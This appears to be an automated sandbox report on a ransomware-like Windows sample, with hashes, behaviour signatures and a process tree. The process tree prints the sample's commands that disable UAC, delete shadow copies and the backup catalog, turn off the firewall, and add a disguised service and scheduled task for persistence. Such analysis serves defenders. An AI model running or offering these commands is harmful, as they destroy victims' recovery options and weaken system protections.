Analysis
-
max time kernel
178s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
10-02-2023 08:40
General
-
Target
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
-
Size
1.2MB
-
MD5
e07ee232400dafd802235b90e0e7e056
-
SHA1
49ab07c411e63e8ad305b58489c69fded1f2db13
-
SHA256
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08
-
SHA512
6607ba5bf390666bf7d3487984c3241783a5137fa2f3af3bc8173a7a1520d1fe5456512cb6eecd613b5ccb30d5f0a41df9987886d1818269068f6fd27958ac41
-
SSDEEP
24576:Kwh7cD9+IBdH0oIX68Ta7fGXbt8RRnUtX642Rg0ybdDHSF1dRiDHBT2c+T:H7cDUIBdH0Pe7FnUtXh0wSVRi7BT2c+T
Score
10/10
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Creates new service(s) 1 TTPs
-
Modifies Windows Firewall 1 TTPs 3 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 8 IoCs
-
Enumerates processes with tasklist 1 TTPs 9 IoCs
-
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 54 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\S-8459.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\S-6748.bat4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\S-6748.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\S-2153.bat'" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet2⤵
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\S-2153.batFilesize
138B
MD582a528cbf39b8ea7e2982e7b2305204c
SHA1717836e0e2b304ed7ae239cc1db0f6f80e0419b1
SHA256616738526c38e04f992b7b9fc60cb7feb3ee416bf47b69aa2c3a5f1a722a653b
SHA512eff7654e171dbd9bc471718a7e14ee3c84a9edf948f4c8863c8107e653be8ba06bc7a2876d506d6e4ae7ef2280e820d04615ebcd88894ef01b3667d070241db3
-
C:\Users\Admin\AppData\S-6748.batFilesize
2KB
MD53dba4c2dba3286a09d0b8ee61569f602
SHA14fb2a73854fad23f26d08c76fdda4e2268ea5f9e
SHA25689d549b2862e20141b0b25ed7165a00e27ed865c6fb78be56393b8395465f5c7
SHA512054c3c7ff25534a4b24f03ec62aa38c0f8352948d350f008f1b7beb3c72ea3c495fcb8c3194d9bfc3fffc363c2bca5c05d520942c063d450127c188afc2ba0d0
-
C:\Users\Admin\AppData\S-8459.vbsFilesize
686B
MD5ed7a274ff8ac640416952bfb5d6c927a
SHA16b33cd5b39db6e9a900336e446f64a137f0a0f42
SHA2564d68e4a7a437eb4a7ad9c7b28bdda894a68ae41efba8a5e4d3a6a930bebfeea5
SHA5128f3a4f071550afe716c5d39601cf1e8559084fbb701e95b28eb7685fed6d8a972e662ad19124a2242fd30c291b8dd1f18f1a2dcf56ac6c98f2bf96bac91510f3
-
memory/208-188-0x0000000000000000-mapping.dmp
-
memory/212-135-0x0000000000000000-mapping.dmp
-
memory/396-158-0x0000000000000000-mapping.dmp
-
memory/400-138-0x0000000000000000-mapping.dmp
-
memory/648-134-0x0000000000000000-mapping.dmp
-
memory/780-173-0x0000000000000000-mapping.dmp
-
memory/816-136-0x0000000000000000-mapping.dmp
-
memory/1004-133-0x0000000000000000-mapping.dmp
-
memory/1092-187-0x0000000000000000-mapping.dmp
-
memory/1224-184-0x0000000000000000-mapping.dmp
-
memory/1300-156-0x0000000000000000-mapping.dmp
-
memory/1340-170-0x0000000000000000-mapping.dmp
-
memory/1372-146-0x0000000000000000-mapping.dmp
-
memory/1396-132-0x0000000000000000-mapping.dmp
-
memory/1552-155-0x0000000000000000-mapping.dmp
-
memory/1656-165-0x0000000000000000-mapping.dmp
-
memory/1856-181-0x0000000000000000-mapping.dmp
-
memory/1892-139-0x0000000000000000-mapping.dmp
-
memory/2024-163-0x0000000000000000-mapping.dmp
-
memory/2068-175-0x0000000000000000-mapping.dmp
-
memory/2216-183-0x0000000000000000-mapping.dmp
-
memory/2456-162-0x0000000000000000-mapping.dmp
-
memory/2824-159-0x0000000000000000-mapping.dmp
-
memory/2880-151-0x0000000000000000-mapping.dmp
-
memory/2936-180-0x0000000000000000-mapping.dmp
-
memory/3024-176-0x0000000000000000-mapping.dmp
-
memory/3096-169-0x0000000000000000-mapping.dmp
-
memory/3180-164-0x0000000000000000-mapping.dmp
-
memory/3236-145-0x0000000000000000-mapping.dmp
-
memory/3404-168-0x0000000000000000-mapping.dmp
-
memory/3448-152-0x0000000000000000-mapping.dmp
-
memory/3464-161-0x0000000000000000-mapping.dmp
-
memory/3468-172-0x0000000000000000-mapping.dmp
-
memory/3472-185-0x0000000000000000-mapping.dmp
-
memory/3572-148-0x0000000000000000-mapping.dmp
-
memory/3576-186-0x0000000000000000-mapping.dmp
-
memory/3648-137-0x0000000000000000-mapping.dmp
-
memory/3736-167-0x0000000000000000-mapping.dmp
-
memory/3784-154-0x0000000000000000-mapping.dmp
-
memory/3848-171-0x0000000000000000-mapping.dmp
-
memory/4048-160-0x0000000000000000-mapping.dmp
-
memory/4076-166-0x0000000000000000-mapping.dmp
-
memory/4188-157-0x0000000000000000-mapping.dmp
-
memory/4204-141-0x0000000000000000-mapping.dmp
-
memory/4208-174-0x0000000000000000-mapping.dmp
-
memory/4248-142-0x0000000000000000-mapping.dmp
-
memory/4368-150-0x0000000000000000-mapping.dmp
-
memory/4392-147-0x0000000000000000-mapping.dmp
-
memory/4404-178-0x0000000000000000-mapping.dmp
-
memory/4456-140-0x0000000000000000-mapping.dmp
-
memory/4500-179-0x0000000000000000-mapping.dmp
-
memory/4516-177-0x0000000000000000-mapping.dmp
-
memory/4708-182-0x0000000000000000-mapping.dmp
-
memory/4784-153-0x0000000000000000-mapping.dmp